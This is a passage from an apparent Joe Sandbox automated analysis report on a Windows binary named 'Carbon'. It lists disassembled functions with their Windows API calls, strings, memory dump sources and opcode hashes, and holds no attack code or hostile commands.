                                                            • Opcode Fuzzy Hash: d60c0fd4dbad9d75f17fd7b31fd9289dd22683579ba1c29f95400141bdded1b8
                                                            • Instruction Fuzzy Hash: 13F0BE70C6A231ABA701BF14BC01D183BA4FB15722750021AF018962BACB300941BFC4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00978305 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00910592: EnterCriticalSection.KERNEL32(009C16FC,?,?,?,008FC0BA,009C3560,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 0091059D
                                                              • Part of subcall function 00910592: LeaveCriticalSection.KERNEL32(009C16FC,?,?,?,008FC0BA,009C3560,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 009105DA
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 009103F3: __onexit.LIBCMT ref: 009103F9
                                                            • __Init_thread_footer.LIBCMT ref: 00978382
                                                              • Part of subcall function 00910548: EnterCriticalSection.KERNEL32(009C16FC,?,?,008FC0E8,009C3560,00932799,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 00910552
                                                              • Part of subcall function 00910548: LeaveCriticalSection.KERNEL32(009C16FC,?,008FC0E8,009C3560,00932799,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 00910585
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                            • API String ID: 535116098-3733170431
                                                            • Opcode ID: b76d374b1b9020bb8fd0d8a81a427b9da5da8b395953edda87b02020a5c45dd4
                                                            • Instruction ID: 888594413fc1e6034b0650faa62f5858068844b0b6a60c2c727b374f03fe0527
                                                            • Opcode Fuzzy Hash: b76d374b1b9020bb8fd0d8a81a427b9da5da8b395953edda87b02020a5c45dd4
                                                            • Instruction Fuzzy Hash: 5D91B272A40209EFCB14EF54C895DAEB7B5FF48704F14C449F9099B292DB71AE41CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00986042 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00986081
                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009860AE
                                                            • DrawMenuBar.USER32(?), ref: 009860BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw
                                                            • String ID: 0
                                                            • API String ID: 3227129158-4108050209
                                                            • Opcode ID: 19491a10461c85009e6ae1a6189ab813d6eb61c9426c5cc1ef3a37fe71c37dcc
                                                            • Instruction ID: c4ef528d56a84d6f3ddac40d7ac3448dd8bcaca1b95e4b6cfb01391711ada984
                                                            • Opcode Fuzzy Hash: 19491a10461c85009e6ae1a6189ab813d6eb61c9426c5cc1ef3a37fe71c37dcc
                                                            • Instruction Fuzzy Hash: AF018C71614218EFDB20AF51DC44BEA7BB9FF45350F1080AAF849DA251DB758A88EF21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009241D0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                            • Instruction ID: 1d5b65f008518215c306b6b5aa898099c646e4e6a2f10464c1caf6ddd09f9473
                                                            • Opcode Fuzzy Hash: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                            • Instruction Fuzzy Hash: FEA1AA32A043A6DFEB21DF18E8917BEBBE9EF51310F18416DE5949B285C3388C41CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0097225D Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00972284
                                                            • WSAGetLastError.WSOCK32 ref: 00972292
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00972311
                                                            • WSAGetLastError.WSOCK32 ref: 0097231B
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$socket
                                                            • String ID:
                                                            • API String ID: 1881357543-0
                                                            • Opcode ID: b3e038a3e6c87105dfbe6d5384a9a0ea6ed16e741ed14c9eb1d66457ba56274a
                                                            • Instruction ID: 6df489cb27a5ef321c3ea6d49c5bc93dc6a47b0590b4a1533b76a73a86eec158
                                                            • Opcode Fuzzy Hash: b3e038a3e6c87105dfbe6d5384a9a0ea6ed16e741ed14c9eb1d66457ba56274a
                                                            • Instruction Fuzzy Hash: 3541A035610204AFE720AF28C886F2A77A5EF44718F54C09CFA1A9F3D3D676ED418B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095E5D6 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008F3914: _wcslen.LIBCMT ref: 008F3919
                                                            • _wcslen.LIBCMT ref: 0095E60C
                                                            • _wcslen.LIBCMT ref: 0095E623
                                                            • _wcslen.LIBCMT ref: 0095E64E
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0095E659
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ExtentPoint32Text
                                                            • String ID:
                                                            • API String ID: 3763101759-0
                                                            • Opcode ID: dc02a587ca7f20cb411d37c950ef959e3d854141ea7d3506d9d239798a83daa5
                                                            • Instruction ID: 45d7456b2e794a7a52c0a32f7c5280c7c63d2ea68ae49c42e15c6295541b945c
                                                            • Opcode Fuzzy Hash: dc02a587ca7f20cb411d37c950ef959e3d854141ea7d3506d9d239798a83daa5
                                                            • Instruction Fuzzy Hash: 8B21D671A01218AFCB15EFA8C981BAEB7F8EF95751F104055EC04BB241D6B19F418BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00952109 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00952129
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095213B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00952151
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095216C
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f134953ff40631c961a5845ec1c4ee5fbb77d53c7dbb05d1ebd3d280a09ec866
                                                            • Instruction ID: 10046fab19ae5e43aa6bd9a52031910379ea801d82697d992529fb16a8f7cf02
                                                            • Opcode Fuzzy Hash: f134953ff40631c961a5845ec1c4ee5fbb77d53c7dbb05d1ebd3d280a09ec866
                                                            • Instruction Fuzzy Hash: 4911393A900218FFEF11DBA5CD85F9EBBB8FB49750F200091EA01B7290D6716E11DB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0098A5DF Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00909DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00909DE2
                                                            • GetClientRect.USER32(?,?), ref: 0098A61D
                                                            • GetCursorPos.USER32(?), ref: 0098A627
                                                            • ScreenToClient.USER32(?,?), ref: 0098A632
                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 0098A666
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 08bfe60bb458d949ddcfe8fc1307ca44e0287730a77102380bf4a0f9e59c4c7a
                                                            • Instruction ID: c756761dbde902c91650af86c3538f1b5dec60b096b3b0ded9f4e623b46f5a23
                                                            • Opcode Fuzzy Hash: 08bfe60bb458d949ddcfe8fc1307ca44e0287730a77102380bf4a0f9e59c4c7a
                                                            • Instruction Fuzzy Hash: EA114C31911119ABEB10EF68CC499EE7BB8FF44300F140456F912E3281E770AE81DBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00988500 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0098851F
                                                            • ScreenToClient.USER32(?,?), ref: 00988537
                                                            • ScreenToClient.USER32(?,?), ref: 0098855B
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00988576
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 785c907d88adfcdb322bca824144e53ffe7b158b130b3a8843cd02bc9738f3c0
                                                            • Instruction ID: f949fb3c4ceff21b5f9eedf8146d7586660373e1a94eedb1648cefbf2465d813
                                                            • Opcode Fuzzy Hash: 785c907d88adfcdb322bca824144e53ffe7b158b130b3a8843cd02bc9738f3c0
                                                            • Instruction Fuzzy Hash: DA1143B9D0520DAFDB41DF98C484AEEBBB9FB08310F108156E915E3350E735AA54DF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0091E5CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 0091E65D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__start
                                                            • String ID: pow
                                                            • API String ID: 3213639722-2276729525
                                                            • Opcode ID: 15fbea7ad8ffbb85968de8edf1a50a9e5d3104eec0b6fc2297eace6da9d42474
                                                            • Instruction ID: df386d2fb0e9b45abad9f8c7cedde1e2556d2bb33f5002bbb3dd9731d2e73450
                                                            • Opcode Fuzzy Hash: 15fbea7ad8ffbb85968de8edf1a50a9e5d3104eec0b6fc2297eace6da9d42474
                                                            • Instruction Fuzzy Hash: A251CE61F1E11996DB117B18ED013FF2BA8EB50790F648D59F881422EEEF348CE59B42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009523C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0095242E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: abe02003f23404dcde461af77190343cc6b47fea6e5006db7d4e16b18e77637e
                                                            • Instruction ID: c0c31364f87a0d4826a1db6e9415ba0feca09e63b55ad8872ee546f317e5f467
                                                            • Opcode Fuzzy Hash: abe02003f23404dcde461af77190343cc6b47fea6e5006db7d4e16b18e77637e
                                                            • Instruction Fuzzy Hash: 0301B5B16052186BCB0CEBA5CC558FE77A8FB56325B000919AD62972E2DA34580D9762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009522BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00952328
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: 82beae8df0cdc07783bf46ab4714347b48eb08b20e025e445786e083376b121f
                                                            • Instruction ID: 429681d7cd7c339f2333aca98625b465bc8aba4a58de4139e038a578a8a288d6
                                                            • Opcode Fuzzy Hash: 82beae8df0cdc07783bf46ab4714347b48eb08b20e025e445786e083376b121f
                                                            • Instruction Fuzzy Hash: 3901F7B16011096BCB08EBA5CA52EFF37A8EB52711F100429AD02A7281DA289E0DD772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095233E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 009523AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: ca94c82510dc91299d3a2ffae2acc2f8e1e5cf82c67b2075e464d2c02a7799e6
                                                            • Instruction ID: 362758d37d51df929029f837d784ce77ace7cc232b481458f3a7787d10b2c293
                                                            • Opcode Fuzzy Hash: ca94c82510dc91299d3a2ffae2acc2f8e1e5cf82c67b2075e464d2c02a7799e6
                                                            • Instruction Fuzzy Hash: BC01F9B16411096BCF08EBA5CA41EFF77ECDB12755F540425BD02B3282DA389E0D9772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095244A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009524B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: ea4b5cc79ad35b30d41584e9e758b7568aac4dcac017ac080ce27c442a7e9a8f
                                                            • Instruction ID: ca2f5355f3c0e0634e9fbb1c9cc3603d1c2a9bb7191036389dfd7477032bad0f
                                                            • Opcode Fuzzy Hash: ea4b5cc79ad35b30d41584e9e758b7568aac4dcac017ac080ce27c442a7e9a8f
                                                            • Instruction Fuzzy Hash: 3CF0F4B1A452196BCB08EBB88C41BFE37A8FB01325F000D15BD22A32D1DA68680C8361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0094E4B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID: %.3d$X64
                                                            • API String ID: 481472006-1077770165
                                                            • Opcode ID: 7e73a6cdac8d4eaa937184b81a2c2d2f4f986b508b6aa4996515e343e883c49f
                                                            • Instruction ID: f6a38ebc503e7745ad8cc1b39d2455adb7e355d9f52cd3583316019fd2869ac0
                                                            • Opcode Fuzzy Hash: 7e73a6cdac8d4eaa937184b81a2c2d2f4f986b508b6aa4996515e343e883c49f
                                                            • Instruction Fuzzy Hash: 90D01275809119EACF9096909C59DB9777CBB08304F548C52F40691150E7389A48AB21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0092C14E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0092C1E4
                                                            • GetLastError.KERNEL32 ref: 0092C1F2
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0092C24D
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: 6012ce23cb6550fac2cd4abac1d772826d73c1f768ac4e967aff6950ce32846f
                                                            • Instruction ID: f95f3e46c738a3157ef091ea33562e9166b30d43b091fd4413f2b03e9edc5f31
                                                            • Opcode Fuzzy Hash: 6012ce23cb6550fac2cd4abac1d772826d73c1f768ac4e967aff6950ce32846f
                                                            • Instruction Fuzzy Hash: AE4118B0604266EFCF258FE4E844BBE7BA9AF42720F254159F86557299DF30CD01DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%